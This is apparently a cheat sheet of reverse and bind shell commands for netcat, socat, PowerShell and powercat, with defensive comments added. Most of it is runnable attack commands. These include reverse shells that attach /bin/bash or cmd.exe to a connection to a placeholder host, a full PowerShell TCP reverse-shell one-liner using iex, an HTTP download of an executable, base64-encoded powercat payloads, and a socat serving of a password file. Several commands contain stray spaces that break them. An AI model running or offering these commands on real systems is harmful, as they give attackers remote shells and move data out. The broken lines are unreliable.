常見的幾種反彈shell(整理中)
netcat
# netcat — comments translated from the original Chinese and annotated from a defensive view.
# Port probe, used like telnet to fingerprint a service (here TCP/110)
nc -nv x.x.x.x 110
# File transfer
# Server side: any peer that can reach TCP/4444 can write to tmp.exe — no authentication and no integrity check on the received file
nc -nlvp 4444 > tmp.exe
# Client side
nc -nv x.x.x.x 4444 < tmp.exe
# Bind shell
# Target: listens on TCP/4444 and attaches cmd.exe to the accepted connection; host-firewall and ingress rules are the control that blocks this
nc -nlvp 4444 -e cmd.exe
# Local machine: connects to the listener
nc -nv x.x.x.x 4444
# Reverse shell
# Local machine: the listener waiting for the callback
nc -nlvp 4444
# Target: outbound connection that attaches /bin/bash to the socket; egress filtering and alerting on a shell whose stdio is a network socket are the defensive controls
nc -nv x.x.x.x 4444 -e /bin/bash
socat
# socat — comments translated from the original Chinese and annotated from a defensive view.
# File transfer
# Server side: serves the file to whoever connects to TCP/443; 'fork' answers every connection, so nothing restricts who can fetch it
socat TCP4-LISTEN:443,fork file:secret_passwords.txt
# Client side: writes what it receives to a new local file
socat TCP4:x.x.x.x:443 file:received_secret_passwords.txt,create
# Reverse shell
# Local machine: listener; each -d raises socat's diagnostic verbosity
socat -d -d TCP4-LISTEN:443 STDOUT
# Target: connects out and attaches /bin/bash to the socket
socat TCP4:x.x.x.x:443 EXEC:/bin/bash
# Encrypted bind shell
# Self-signed certificate and key, concatenated into one PEM for socat
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36 2 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
# Local machine: verify=0 disables certificate checking on both ends, so TLS here hides the traffic from passive capture but authenticates neither peer
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin /bash
socat - OPENSSL:x.x.x.x:443,verify=0
powershell
# powershell — comments translated from the original Chinese and annotated from a defensive view.
# Allow PowerShell scripts to run: Unrestricted removes the script-signing check, a configuration change worth auditing
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy
# Download a file over plain HTTP with WebClient — no TLS and no integrity check on what lands on the desktop
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://x.x.x.x/t.exe','C:\Users\user\Desktop\t.exe')"
# Reverse shell: connects out to x.x.x.x:443, then loops reading from the socket, runs each chunk with iex, and writes the output back; script block logging and command-line auditing capture this one-liner in full
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('x.x.x.x',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII ).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c lient.Close()"
# Bind shell: listens on 0.0.0.0:443 and serves the same read/iex/write loop to the first client that connects
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $byt es.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
powercat
# powercat — comments translated from the original Chinese and annotated from a defensive view.
# Load the script into the current session (dot-sourcing)
. .\powercat.ps1
# Run powercat
powercat -h
# Send a file to x.x.x.x:443 (-i names the input file); unencrypted and unauthenticated, like the netcat transfer
powercat -c x.x.x.x -p 443 -i C:\Users\user\powercat.ps1
# Reverse shell
# Method 1: connect out and attach cmd.exe
powercat -c x.x.x.x -p 443 -e cmd.exe
# Method 2: -g writes the equivalent script to a file, which is then executed
powercat -c x.x.x.x -p 443 -e cmd.exe -g > reverseshell.ps1
./reverseshell.ps1
# base64 "encryption" as the original calls it — it is only encoding, not secrecy; -ge emits an encoded command that powershell -E runs, and the argument can be decoded to recover the script
powercat -c x.x.x.x -p 443 -e cmd.exe -ge > reverseshell. ps1
powershell.exe -E ZgB1...(reverseshell. ps1中base64加密內容)
# Bind shell: listen on 443 and attach cmd.exe
powercat -l -p 443 -e cmd.exe